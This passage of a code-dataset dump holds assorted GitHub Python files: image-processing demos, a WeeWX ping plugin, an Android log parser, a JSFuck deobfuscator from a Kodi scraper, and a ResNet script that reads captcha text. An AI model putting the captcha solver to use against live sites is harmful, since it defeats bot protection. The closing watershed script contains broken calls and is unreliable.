'/' + outfile, img)\n output_file.close()\n\n\nif __name__ == '__main__':\n # mnist 原始文件\n trainfile_X = './mnist/raw/train-images.idx3-ubyte'\n trainfile_y = './mnist/raw/train-labels.idx1-ubyte'\n testfile_X = './mnist/raw/t10k-images.idx3-ubyte'\n testfile_y = './mnist/raw/t10k-labels.idx1-ubyte'\n\n # 加载mnist数据集\n train_X, train_img_nums = DataUtils(filename=trainfile_X).getImage()\n train_y = DataUtils(filename=trainfile_y).getLabel()\n test_X, test_img_nums = DataUtils(testfile_X).getImage()\n test_y = DataUtils(testfile_y).getLabel()\n\n # 以下内容是将图像保存到本地文件中\n path_trainset = './mnist/train'\n path_testset = './mnist/test'\n if not os.path.exists(path_trainset):\n os.mkdir(path_trainset)\n if not os.path.exists(path_testset):\n os.mkdir(path_testset)\n DataUtils(outpath=path_trainset).outImg(train_X, train_y, int(train_img_nums / 10)) # /10是只转换十分之一,用于测试\n DataUtils(outpath=path_testset).outImg(test_X, test_y, int(test_img_nums / 10))\n","repo_name":"mmdjiji/pytorch-learning","sub_path":"codes/mnist2bmp.py","file_name":"mnist2bmp.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39466430124","text":"\"\"\"\r\nhttps://debuggercafe.com/instance-segmentation-with-pytorch-and-mask-r-cnn/\r\nhttps://pytorch.org/vision/stable/models.html#object-detection-instance-segmentation-and-person-keypoint-detection\r\n\"\"\"\r\n\r\nimport torch\r\nfrom PIL import Image\r\nfrom torchvision import models, transforms\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nclass SemanticSegmentaion(object):\r\n def __init__(self):\r\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n self.img_transforms = transforms.Compose([\r\n transforms.ToTensor(),\r\n ])\r\n self.model = models.segmentation.deeplabv3_resnet50(pretrained=True)\r\n self.model.to(self.device)\r\n self.model.eval()\r\n self.coco_classes_list = ['__background__', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus',\r\n 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike',\r\n 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\r\n palette = torch.tensor([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\r\n colors = torch.as_tensor([i for i in range(21)])[:, None] * palette\r\n self.colors = (colors % 255).numpy().astype(\"uint8\")\r\n\r\n def predict_numpy(self, image):\r\n return self._predict_numpy(image)\r\n\r\n def _predict_numpy(self, image):\r\n image = Image.fromarray(image)\r\n image_tensor = self.img_transforms(image)\r\n image_tensor = image_tensor.unsqueeze(0)\r\n image_tensor = image_tensor.to(self.device)\r\n with torch.no_grad():\r\n output = self.model(image_tensor)\r\n output = torch.argmax(output['out'].squeeze(0), dim=0).cpu().numpy().astype(np.uint8)\r\n output = cv2.cvtColor(output, cv2.COLOR_GRAY2RGB)\r\n for idx, coco_class in enumerate(self.coco_classes_list):\r\n if idx == 0:\r\n continue\r\n output = np.where(output==(idx, idx, idx), self.colors[idx], output).astype(np.uint8)\r\n return output\r\n\r\n\r\nif __name__ == \"__main__\":\r\n image_path = 'test.jpg'\r\n kjn = SemanticSegmentaion()\r\n image = cv2.imread(image_path)\r\n output = kjn.predict_numpy(image)\r\n output = cv2.addWeighted(image,0.5,output,0.5,0)\r\n cv2.imshow(\"dupa.jpg\", output)\r\n cv2.waitKey(0)\r\n","repo_name":"kornellewy/youtube-collection","sub_path":"czym_jest_segmentacja_oraz_jak_jej_używać/semantic_seg.py","file_name":"semantic_seg.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11198430537","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n-------------------------------------------------\r\n File Name: predict_test\r\n Description :\r\n Author : DrZ\r\n date: 2019/1/3\r\n-------------------------------------------------\r\n Change Activity:\r\n 2019/1/3:\r\n-------------------------------------------------\r\n\"\"\"\r\nimport tensorflow as tf\r\nimport tensorflow.contrib.slim.nets as nets\r\nfrom PIL import Image\r\nimport os\r\nimport numpy as np\r\n\r\n\r\n# 向量转成标签名字\r\ndef vec2name(vec):\r\n name = []\r\n for i in vec:\r\n a = chr(i + 97)\r\n name.append(a)\r\n return \"\".join(name)\r\n\r\n\r\nmodel_dir = r'F:\\resnet_for_captcha\\3train\\model\\train.model-140000'\r\nx = tf.placeholder(tf.float32, [None, 224, 224, 3])\r\n\r\npred, end_points = nets.resnet_v2.resnet_v2_50(x, num_classes=6 * 26, is_training=True)\r\npredict = tf.reshape(pred, [-1, 6, 26])\r\nmax_idx_p = tf.argmax(predict, 2)\r\nsaver = tf.train.Saver()\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n saver.restore(sess, model_dir)\r\n test_dir = r'F:\\resnet_for_captcha\\test'\r\n for pic in os.listdir(test_dir):\r\n pic_path = os.path.join(test_dir, pic)\r\n img = Image.open(pic_path)\r\n arr = np.array(img) * 255\r\n im = Image.fromarray(arr)\r\n im = im.resize((224, 224))\r\n arr = np.array(im)\r\n xx = np.zeros([224, 224, 3])\r\n for ii in range(224):\r\n for jj in range(224):\r\n xx[ii, jj, :] = arr[ii, jj]\r\n img1 = Image.fromarray(xx.astype('uint8'))\r\n img2 = tf.reshape(img1, [1, 224, 224, 3])\r\n img3 = tf.cast(img2, tf.float32) / 255.0\r\n\r\n name = os.path.splitext(pic)[0]\r\n\r\n b_image = sess.run(img3)\r\n t_label = sess.run(max_idx_p, feed_dict={x: b_image})\r\n vec = t_label[0].tolist()\r\n predict_text = vec2name(vec)\r\n print('真实值:{} 预测值:{}'.format(name, predict_text))","repo_name":"finthon/ResNet-for-captcha","sub_path":"4predict/predict_test.py","file_name":"predict_test.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"74684238826","text":"#ASHITA GOYAL (11) SEC - A1\r\n\r\ndef insertionSort(arr): \r\n \r\n for i in range(1, len(arr)): \r\n \r\n key = arr[i] \r\n \r\n j = i-1\r\n while j >=0 and key < arr[j] : \r\n arr[j+1] = arr[j] \r\n j -= 1\r\n arr[j+1] = key\r\n\r\nl = list(map(int, input(\"ENTER THE LIST TO BE SORTED: \").split()))\r\ninsertionSort(l)\r\nprint(\"SORTED LIST: \", l)\r\n\r\n#Time - Complexity : O(n^2)\r\n","repo_name":"ashita1910/DAA_Assignments","sub_path":"InsertionSort.py","file_name":"InsertionSort.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72204286827","text":"import socket\nimport threading\n\ntry:\n # Python 3\n from urllib.request import urlopen\nexcept ImportError:\n # Python 2\n from urllib2 import urlopen\n\nimport weewx\nfrom weewx.engine import StdService\nfrom weewx.reportengine import ReportGenerator\n\nfrom weeutil.weeutil import to_bool, to_int\n\nVERSION = \"0.1\"\n\ntry:\n # Test for new-style weewx logging by trying to import weeutil.logger\n import weeutil.logger\n import logging\n log = logging.getLogger(__name__) # confirm to standards pylint: disable=invalid-name\n def setup_logging(logging_level, config_dict):\n \"\"\" Setup logging for running in standalone mode.\"\"\"\n if logging_level:\n weewx.debug = logging_level\n\n weeutil.logger.setup('wee_HealthChecks', config_dict)\n\n def logdbg(msg):\n \"\"\" Log debug level. \"\"\"\n log.debug(msg)\n\n def loginf(msg):\n \"\"\" Log informational level. \"\"\"\n log.info(msg)\n\n def logerr(msg):\n \"\"\" Log error level. \"\"\"\n log.error(msg)\n\nexcept ImportError:\n # Old-style weewx logging\n import syslog\n\n def logmsg(level, msg):\n \"\"\" Log the message at the designated level. \"\"\"\n syslog.syslog(level, 'wee_HealthChecks: %s:' % msg)\n\n def logdbg(msg):\n \"\"\" Log debug level. \"\"\"\n logmsg(syslog.LOG_DEBUG, msg)\n\n def loginf(msg):\n \"\"\" Log informational level. \"\"\"\n logmsg(syslog.LOG_INFO, msg)\n\n def logerr(msg):\n \"\"\" Log error level. \"\"\"\n logmsg(syslog.LOG_ERR, msg)\n\ndef send_ping(host, uuid, timeout, ping_type=None):\n \"\"\"Send the HealthChecks 'ping'.\"\"\"\n if ping_type:\n url = \"https://%s/%s/%s\" %(host, uuid, ping_type)\n else:\n url = \"https://%s/%s\" %(host, uuid)\n\n try:\n urlopen(url, timeout=timeout)\n except socket.error as exception:\n logerr(\"Ping failed: %s\" % exception)\n\nclass HealthChecksService(StdService):\n \"\"\" A service to ping a healthchecks server.. \"\"\"\n def __init__(self, engine, config_dict):\n super(HealthChecksService, self).__init__(engine, config_dict)\n\n # service_dict = config_dict.get('HealthChecks', {})\n skin_dict = self.config_dict.get('StdReport', {}).get('HealthChecks', {})\n\n self.enable = to_bool(skin_dict.get('enable', True))\n if not self.enable:\n loginf(\"Not enabled, exiting.\")\n return\n\n self.host = skin_dict.get('host', 'hc-ping.com')\n self.timeout = to_int(skin_dict.get('timeout', 10))\n self.uuid = skin_dict.get('uuid')\n if not self.uuid:\n raise ValueError(\"uuid option is required.\")\n\n send_ping(self.host, self.uuid, self.timeout, \"start\")\n\n # possible option to run as a service only\n # self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)\n # self._thread = HealthChecksServiceThread(self.host, self.uuid, self.timeout)\n # self._thread.start()\n\n def new_archive_record(self, event):\n \"\"\"The new archive record event.\"\"\"\n self._thread.threading_event.set()\n\n def shutDown(self):\n \"\"\"Run when an engine shutdown is requested.\"\"\"\n loginf(\"SHUTDOWN - initiated\")\n\n send_ping(self.host, self.uuid, self.timeout, \"fail\")\n loginf(\"fail ping sent\")\n\n if self._thread:\n loginf(\"SHUTDOWN - thread initiated\")\n self._thread.running = False\n self._thread.threading_event.set()\n self._thread.join(20.0)\n if self._thread.is_alive():\n logerr(\"Unable to shut down %s thread\" %self._thread.name)\n\n self._thread = None\n\nclass HealthChecksServiceThread(threading.Thread):\n \"\"\"A service to send 'pings' to a HealthChecks server. \"\"\"\n def __init__(self, host, uuid, timeout):\n threading.Thread.__init__(self)\n\n self.running = False\n\n self.host = host\n self.uuid = uuid\n self.timeout = timeout\n\n self.threading_event = threading.Event()\n\n def run(self):\n self.running = True\n\n while self.running:\n self.threading_event.wait()\n send_ping(self.host, self.uuid, self.timeout)\n self.threading_event.clear()\n\n loginf(\"exited loop\")\n\nclass HealthChecksGenerator(ReportGenerator):\n \"\"\"Class for managing the healthchecks generator.\"\"\"\n def __init__(self, config_dict, skin_dict, *args, **kwargs):\n \"\"\"Initialize an instance of HealthChecksGenerator\"\"\"\n weewx.reportengine.ReportGenerator.__init__(self, config_dict, skin_dict, *args, **kwargs)\n\n self.host = skin_dict.get('host', 'hc-ping.com')\n self.timeout = to_int(skin_dict.get('timeout', 10))\n self.uuid = skin_dict.get('uuid')\n if not self.uuid:\n raise ValueError(\"uuid option is required.\")\n\n def run(self):\n send_ping(self.host, self.uuid, self.timeout)\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"bellrichm/WeeWX-Extras","sub_path":"bin/user/healthchecks.py","file_name":"healthchecks.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16729046322","text":"import gym\nimport gymtorch\nsim=1\nnum_envs=50\nactors_per_env=200\n\n# lignes pour regarder toutes les pos,ori,vit,vit_ang, à faire un fois, avant que la sim commence\n_root_tensor = gym.acquire_actor_root_state_tensor(sim)\nroot_tensor = gymtorch.wrap_tensor(_root_tensor) # wrap it to acces the data\n# mettre une vue : vecteur d'environements\nroot_states_vec = root_tensor.view(num_envs,actors_per_env,13)\nroot_positions = root_states_vec[..., 0:3]\nroot_orientations = root_states_vec[..., 3:7]\nroot_linvels = root_states_vec[..., 7:10]\nroot_angvels = root_states_vec[..., 10:13]\n\n# pour update ( dans la boucle de simulation ) ca : ( à mettre après gym.simulate(sim) )\ngym.refresh_actor_root_state(sim)\n\n# pour modifier mettre ca aprees avoir changé le tenseur _root_tensor du début:\ngym.set_actor_root_state_tensor(sim,_root_tensor)\n\n# APPLYING CONTROLS\n\n","repo_name":"seanmoyal/testIsaac","sub_path":"Isaac/decompo_tensors.py","file_name":"decompo_tensors.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33960406225","text":"import numpy\nimport pickle\nfrom lib.utils import *\n\n\n\nclass Parser:\n def __init__(self, log_directory, device, build):\n self.log_directory = log_directory\n self.device = device\n self.build = build\n\n def collect_report(self):\n report_filename = self.log_directory + \"/\" + Config().reportFilename\n obj = [self.device, self.build, self.mem_log_parser(), self.cpu_log_parser(), self.bty_usage_log_parser(),\n self.bty_temp_log_parser(), self.data_log_parser(), self.events_parser()]\n output = open(report_filename, 'wb')\n pickle.dump(obj, output, 2)\n\n def mem_log_parser(self):\n mem_filename = self.log_directory + \"/\" + Config().memFilename\n infile = open(mem_filename).readlines()\n num_lines = len(infile)\n mem_list = []\n time_list = []\n i = 0\n while i < num_lines:\n i += 1\n mem = 0\n mem_time = 0\n while i < num_lines and '---' not in infile[i]:\n if 'MemFree:' in infile[i]:\n mem = int(infile[i].split()[-2])/1024\n if 'Time pass:' in infile[i]:\n mem_time = int(infile[i].split()[-2])\n i += 1\n mem_list.append(mem)\n time_list.append(mem_time)\n report = [mem_list, time_list, max(mem_list), min(mem_list), numpy.average(mem_list)]\n\n return report\n\n def cpu_log_parser(self):\n cpu_filename = self.log_directory + \"/\" + Config().cpuFilename\n infile = open(cpu_filename).readlines()\n num_lines = len(infile)\n cpu_list = []\n time_list = []\n i = 0\n while i < num_lines:\n i += 1\n cpu_value = 0\n cpu_time = 0\n while i < num_lines and '---' not in infile[i]:\n if Config().package in infile[i]:\n if float(infile[i].split()[2].strip('%')) <100:\n cpu_value = float(infile[i].split()[2].strip('%'))\n elif i==0:\n cpu_value = 0\n else:\n cpu_value = cpu_list[len(cpu_list)-1]\n if 'Time pass:' in infile[i]:\n cpu_time = int(infile[i].split()[-2])\n i += 1\n time_list.append(cpu_time)\n cpu_list.append(cpu_value)\n max_cpu = max(cpu_list)\n min_cpu = min(cpu_list)\n median_cpu = numpy.average(cpu_list)\n\n report = [cpu_list, time_list, max_cpu, min_cpu, median_cpu]\n return report\n\n def bty_usage_log_parser(self):\n bty_log_filename = self.log_directory + \"/\" + Config().btyFilename\n bty_level_list = []\n time_list = []\n infile = open(bty_log_filename).readlines()\n num_lines = len(infile)\n i = 0\n while i < num_lines:\n bty_level = -1\n i += 1\n btr_time = 0\n while i < num_lines and '---' not in infile[i]:\n if 'level:' in infile[i]:\n bty_level = int(infile[i].strip().split()[-1])\n if 'Time pass:' in infile[i]:\n btr_time = int(infile[i].split()[-2])\n i += 1\n bty_level_list.append(bty_level)\n time_list.append(btr_time)\n max_bat = max(bty_level_list)\n min_bat = min(bty_level_list)\n diff_bat = (max_bat - min_bat)\n report = [bty_level_list, time_list, max_bat, min_bat, diff_bat]\n return report\n\n def bty_temp_log_parser(self):\n bty_log_filename = self.log_directory + \"/\" + Config().btyFilename\n bty_tmpt_list = []\n time_list = []\n infile = open(bty_log_filename).readlines()\n num_lines = len(infile)\n i = 0\n while i < num_lines:\n bty_temp = -1\n i += 1\n btr_time = 0\n while i < num_lines and '---' not in infile[i]:\n if 'temperature:' in infile[i]:\n bty_temp = int(infile[i].strip().split()[-1])\n if 'Time pass:' in infile[i]:\n btr_time = int(infile[i].split()[-2])\n i += 1\n bty_tmpt_list.append(bty_temp)\n time_list.append(btr_time)\n max_temp = max(bty_tmpt_list)\n min_temp = min(bty_tmpt_list)\n diff_temp = (max_temp - min_temp)\n\n report = [bty_tmpt_list, time_list, max_temp, min_temp, diff_temp]\n return report\n\n def data_log_parser(self):\n data_log_filename = self.log_directory + \"/\" + Config().dtuFilename\n background_rx = []\n background_tx = []\n foreground_rx = []\n foreground_tx = []\n time_list = []\n infile = open(data_log_filename).readlines()\n num_lines = len(infile)\n i = 0\n while i < num_lines:\n while i < num_lines and '---' not in infile[i]:\n i += 1\n if i >= num_lines:\n break\n i += 1\n background_rx_mbbytes = - 0.1\n background_tx_mbbytes = - 0.1\n foreground_rx_mbbytes = - 1\n foreground_tx_mbbytes = - 1\n\n while i < num_lines and '---' not in infile[i]:\n if 'background_rx_bytes' in infile[i]:\n background_rx_mbbytes = int(infile[i].split(\"=\")[-1].strip())/1024/1024\n if 'background_tx_bytes' in infile[i]:\n background_tx_mbbytes = int(infile[i].split(\"=\")[-1].strip())/1024/1024\n if 'foreground_rx_bytes' in infile[i]:\n foreground_rx_mbbytes = int(infile[i].split(\"=\")[-1].strip())/1024/1024\n if 'foreground_tx_bytes' in infile[i]:\n foreground_tx_mbbytes = int(infile[i].split(\"=\")[-1].strip())/1024/1024\n if 'Time pass:' in infile[i]:\n times = int(infile[i].split()[-2])\n i += 1\n\n background_rx.append(background_rx_mbbytes)\n background_tx.append(background_tx_mbbytes)\n foreground_rx.append(foreground_rx_mbbytes)\n foreground_tx.append(foreground_tx_mbbytes)\n time_list.append(times)\n data = [background_rx, background_tx, foreground_rx, foreground_tx]\n report = [data, time_list]\n\n return report\n\n def events_parser(self):\n events_dir_path = Folders().events_folders_creation(self.log_directory)\n\n for event_name in Config().events_list:\n\n log_captured = events_dir_path+\"/log_captured.txt\"\n os.system(\"grep -i \\\"\"+event_name+\"\\\" \"+self.log_directory+\"/*\"+\"com.verizon\"+\"* > \" + log_captured)\n\n results_file = events_dir_path+\"/\"+event_name+\".txt\"\n output = open(results_file, \"w\")\n n = 0\n for line in open(log_captured):\n if len(line) > 2:\n n+=1\n str1 = line[line.find(event_name):line.find(event_name)+len(event_name)]\n line = line.split()\n epoch = line[2]\n local_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(float(epoch)))\n output.write(\" epoch=\"+epoch+\" ---> Local time = \"+local_time+\" \"+str1+\" \"+str(n))\n output.write(\"\\n\")\n output.write(\"===========================================================================\\n\")\n output.close()\n os.system(\"rm \"+log_captured)\n # print(event_name + \" - \" + str(n))\n\n event_report_name = []\n event_report_quant = []\n\n for event_name in Config().events_list:\n log_captured = events_dir_path+'/'+event_name+'.txt'\n n = 0\n for line in open(log_captured):\n if line>2 and line.find('epoch')!=-1:\n n+=1\n event_report_name.append(str(event_name))\n event_report_quant.append(n)\n report = [event_report_name, event_report_quant]\n return report\n\n","repo_name":"mrmaxformax/android_framework","sub_path":"lib/adtLogParser.py","file_name":"adtLogParser.py","file_ext":"py","file_size_in_byte":8052,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"32692337539","text":"import re\nimport string\n\nfrom resources.lib.util import Quote, Unquote\n\n\nclass JSUnfuck(object):\n numbers = None\n words = {\n \"(![]+[])\": \"false\",\n \"([]+{})\": \"[object Object]\",\n \"(!![]+[])\": \"true\",\n \"([][[]]+[])\": \"undefined\",\n \"(+{}+[])\": \"NaN\",\n \"([![]]+[][[]])\": \"falseundefined\",\n \"([][f+i+l+t+e+r]+[])\": \"function filter() { [native code] }\",\n \"(!![]+[][f+i+l+t+e+r])\": \"truefunction filter() { [native code] }\",\n \"(+![]+([]+[])[c+o+n+s+t+r+u+c+t+o+r])\": \"0function String() { [native code] }\",\n \"(+![]+[![]]+([]+[])[c+o+n+s+t+r+u+c+t+o+r])\": \"0falsefunction String() { [native code] }\",\n \"([]+[][s+o+r+t][c+o+n+s+t+r+u+c+t+o+r](r+e+t+u+r+n+ +l+o+c+a+t+i+o+n)())\": \"https://123movies.to\",\n \"([]+[])[f+o+n+t+c+o+l+o+r]()\": '',\n \"(+(+!![]+e+1+0+0+0)+[])\": \"Infinity\",\n \"(+[![]]+[][f+i+l+t+e+r])\": 'NaNfunction filter() { [native code] }',\n '(+[![]]+[+(+!+[]+(!+[]+[])[3]+[1]+[0]+[0]+[0])])': 'NaNInfinity',\n '([]+[])[i+t+a+l+i+c+s]()': '',\n '[[]][c+o+n+c+a+t]([[]])+[]': ',',\n '([][f+i+l+l]+[])': 'function fill() { [native code]}',\n '(!![]+[][f+i+l+l])': 'truefunction fill() { [native code]}',\n '((+[])[c+o+n+s+t+r+u+c+t+o+r]+[])': 'function Number() {[native code]} _display:45:1',\n '(+(+!+[]+[1]+e+[2]+[0])+[])': '1.1e+21',\n '([]+[])[c+o+n+s+t+r+u+c+t+o+r][n+a+m+e]': 'S+t+r+i+n+g',\n '([][e+n+t+r+i+e+s]()+[])': '[object Array Iterator]',\n '([]+[])[l+i+n+k](\")': '',\n '(![]+[0])[i+t+a+l+i+c+s]()': 'false0',\n # dummy to force array dereference\n 'DUMMY1': '6p',\n 'DUMMY2': '2x',\n 'DUMMY3': '%3C',\n 'DUMMY4': '%5B',\n 'DUMMY5': '6q',\n 'DUMMY6': '4h',\n }\n\n uniqs = {\n '[t+o+S+t+r+i+n+g]': 1,\n '[][f+i+l+t+e+r][c+o+n+s+t+r+u+c+t+o+r](r+e+t+u+r+n+ +e+s+c+a+p+e)()': 2,\n '[][f+i+l+t+e+r][c+o+n+s+t+r+u+c+t+o+r](r+e+t+u+r+n+ +u+n+e+s+c+a+p+e)()': 3,\n '[][s+o+r+t][c+o+n+s+t+r+u+c+t+o+r](r+e+t+u+r+n+ +e+s+c+a+p+e)()': 2,\n '[][s+o+r+t][c+o+n+s+t+r+u+c+t+o+r](r+e+t+u+r+n+ +u+n+e+s+c+a+p+e)()': 3,\n }\n\n def __init__(self, js):\n self.js = js\n\n def decode(self, replace_plus=True):\n while True:\n start_js = self.js\n self.repl_words(self.words)\n self.repl_numbers()\n self.repl_arrays(self.words)\n self.repl_uniqs(self.uniqs)\n if start_js == self.js:\n break\n\n if replace_plus:\n self.js = self.js.replace('+', '')\n self.js = re.sub('\\[[A-Za-z]*\\]', '', self.js)\n self.js = re.sub('\\[(\\d+)\\]', '\\\\1', self.js)\n\n # foutu ici pr le moment\n self.js = self.js.replace('(+)', '0')\n self.js = self.js.replace('(+!!)', '1')\n\n return self.js\n\n def repl_words(self, words):\n while True:\n start_js = self.js\n for key, value in sorted(words.items(), key=lambda x: len(x[0]), reverse=True):\n self.js = self.js.replace(key, value)\n\n if self.js == start_js:\n break\n\n def repl_arrays(self, words):\n for word in sorted(words.values(), key=lambda x: len(x), reverse=True):\n for index in range(0, 100):\n try:\n repl = word[index]\n self.js = self.js.replace('%s[%d]' % (word, index), repl)\n except:\n pass\n\n def repl_numbers(self):\n if self.numbers is None:\n self.numbers = self.__gen_numbers()\n\n while True:\n start_js = self.js\n for key, value in sorted(self.numbers.items(), key=lambda x: len(x[0]), reverse=True):\n self.js = self.js.replace(key, value)\n\n if self.js == start_js:\n break\n\n def repl_uniqs(self, uniqs):\n for key, value in uniqs.items():\n if key in self.js:\n if value == 1:\n self.__handle_tostring()\n elif value == 2:\n self.__handle_escape(key)\n elif value == 3:\n self.__handle_unescape(key)\n\n def __handle_tostring(self):\n for match in re.finditer('(\\d+)\\[t\\+o\\+S\\+t\\+r\\+i\\+n\\+g\\](\\d+)', self.js):\n repl = to_base(match.group(1), match.group(2))\n self.js = self.js.replace(match.group(0), repl)\n\n def __handle_escape(self, key):\n while True:\n start_js = self.js\n offset = self.js.find(key) + len(key)\n if self.js[offset] == '(' and self.js[offset + 2] == ')':\n c = self.js[offset + 1]\n self.js = self.js.replace('%s(%s)' % (key, c), Quote(c))\n\n if start_js == self.js:\n break\n\n def __handle_unescape(self, key):\n start = 0\n while True:\n start_js = self.js\n offset = self.js.find(key, start)\n if offset == -1:\n break\n\n offset += len(key)\n expr = ''\n extra = ''\n last_c = self.js[offset - 1]\n abort = False\n for i, c in enumerate(self.js[offset:]):\n extra += c\n if c == ')':\n break\n elif (i > 0 and c == '(') or (c == '[' and last_c != '+'):\n abort = True\n break\n elif c == '%' or c in string.hexdigits:\n expr += c\n last_c = c\n\n if not abort:\n self.js = self.js.replace(key + extra, Unquote(expr))\n\n if start_js == self.js:\n break\n else:\n start = offset\n\n def __gen_numbers(self):\n n = {'(+[]+[])': '0', '(+![]+([]+[]))': '0', '[+[]]': '[0]',\n '(+!![]+[])': '1', '[+!+[]]': '[1]', '[+!![]]': '[1]',\n '[+!+[]+[+[]]]': '[10]', '+(1+1)': '11', '(+20)': '20'}\n\n for i in range(2, 20):\n key = '+!![]' * (i - 1)\n key = '!+[]' + key\n n['(' + key + ')'] = str(i)\n key += '+[]'\n n['(' + key + ')'] = str(i)\n n['[' + key + ']'] = '[' + str(i) + ']'\n\n for i in range(2, 10):\n key = '!+[]+' * (i - 1) + '!+[]'\n n['(' + key + ')'] = str(i)\n n['[' + key + ']'] = '[' + str(i) + ']'\n\n key = '!+[]' + '+!![]' * (i - 1)\n n['[' + key + ']'] = '[' + str(i) + ']'\n\n for i in range(0, 10):\n key = '(+(+!+[]+[%d]))' % (i)\n n[key] = str(i + 10)\n key = '[+!+[]+[%s]]' % (i)\n n[key] = '[' + str(i + 10) + ']'\n\n for tens in range(2, 10):\n for ones in range(0, 10):\n key = '!+[]+' * (tens) + '[%d]' % (ones)\n n['(' + key + ')'] = str(tens * 10 + ones)\n n['[' + key + ']'] = '[' + str(tens * 10 + ones) + ']'\n\n for hundreds in range(1, 10):\n for tens in range(0, 10):\n for ones in range(0, 10):\n key = '+!+[]' * hundreds + '+[%d]+[%d]))' % (tens, ones)\n if hundreds > 1:\n key = key[1:]\n key = '(+(' + key\n n[key] = str(hundreds * 100 + tens * 10 + ones)\n return n\n\n\ndef to_base(n, base, digits=\"0123456789abcdefghijklmnopqrstuvwxyz\"):\n n, base = int(n), int(base)\n if n < base:\n return digits[n]\n else:\n return to_base(n // base, base, digits).lstrip(digits[0]) + digits[n % base]\n","repo_name":"Kodi-vStream/venom-xbmc-addons","sub_path":"plugin.video.vstream/resources/lib/jsunfuck.py","file_name":"jsunfuck.py","file_ext":"py","file_size_in_byte":7686,"program_lang":"python","lang":"en","doc_type":"code","stars":456,"dataset":"github-code","pt":"37"} +{"seq_id":"43604152998","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 3 22:37:02 2018\r\n\r\n@author: yeshwanth R\r\n\"\"\"\r\nfrom sys import exit\r\nfrom scipy import ndimage as ndi\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom skimage.morphology import watershed, disk\r\nfrom skimage import data\r\nfrom skimage.io import imread\r\nfrom skimage.filters import rank\r\nfrom skimage.color import rgb2gray\r\nfrom skimage.util import img_as_ubyte\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nimage = cv2.imread('25_training.tif')\r\nkernel = np.ones((2,2), np.uint8)\r\nkernel1 = np.ones((7,7), np.uint8)\r\nkernel2 = np.ones((7,7), np.uint8)\r\ng = image.copy()\r\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\r\n# set blue and red channels to 0\r\ng[:, :, 0] = 0\r\ng[:, :, 2] = 0\r\nimg_grey = cv2.cvtColor(g, cv2.COLOR_BGR2GRAY)\r\nimg_grey=(255-img_grey)\r\n\r\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\r\n\r\ncl1 = clahe.apply(img_grey)\r\ncl1 = cv2.dilate(cl1,kernel,iterations = 1)\r\n\r\n#cv2.imshow(\"op3\",cl1)\r\nerosion = cv2.erode(cl1,kernel1,iterations = 1)\r\n\r\nerosion=cv2.GaussianBlur(erosion,(5,5),0)\r\nerosion=cv2.blur(erosion,(5,5),0)\r\n#erosion = cv2.medianBlur(cl1,1)\r\n#opening = cv2.morphologyEx(cl1, cv2.MORPH_OPEN, kernel)\r\n#cv2.imshow(\"op2\",erosion)\r\n#cv2.normalize(opening, opening, 0, 255, cv2.NORM_MINMAX)\r\n#opening=(255-opening)\r\nx=cv2.subtract(cl1,erosion)\r\nx = cv2.medianBlur(x,5)\r\ncv2.imshow(\"x\",x)\r\nx1 = cv2.morphologyEx(x, cv2.MORPH_OPEN, kernel2)\r\n#cv2.imshow(\"op1\",x1)\r\nx2=cv2.subtract(x,x1)\r\ncv2.imshow(\"x2\",x2)\r\nx3 = cv2.morphologyEx(x2, cv2.MORPH_OPEN, kernel2)\r\nx4=cv2.subtract(x2,x3)\r\nx5=cv2.add(x2,x4)\r\ncv2.imshow(\"x5\",x5)\r\n\r\nimage1 = img_as_ubyte(x5)\r\nmarkers = rank.gradient(image.disk(5)) < 20\r\nmarkers = ndi.label(markers)[0]\r\n\r\ngradient = rank.gradient(image, disk(2))\r\n\r\nlabels = watershed(gradient, markers)\r\n\r\nfig, axes = plt.subplots(nrows=2, ncols=2, figsize=(8,8), sharex=True,\r\n sharey=True, subplot_kw={'adjustable':'box-forced'})\r\n\r\nax = axes.ravel()\r\n\r\nax[0].imshow(image, cmap=plt.cm.gray, interpolation='nearest')\r\nax[0].set_title(\"Original\")\r\n\r\nax[1].imshow(gradient, cmap=plt.cm.spectral, interpolation='nearest')\r\nax[1].set_title(\"Local Gradient\")\r\n\r\nax[2].imshow(markers, cmap=plt.cm.spectral, interpolation='nearest')\r\nax[2].set_title(\"Markers\")\r\n\r\nax[3].imshow(image, cmap=plt.cm.gray, interpolation='nearest')\r\nax[3].imshow(labels, cmap=plt.cm.spectral, interplolation='nearest',alpha=.7)\r\n\r\nax[3].set_title(\"segmented\")\r\n\r\nfor a in ax:\r\n a.axis('off')\r\n \r\n fig.tight_layout()\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#edges = 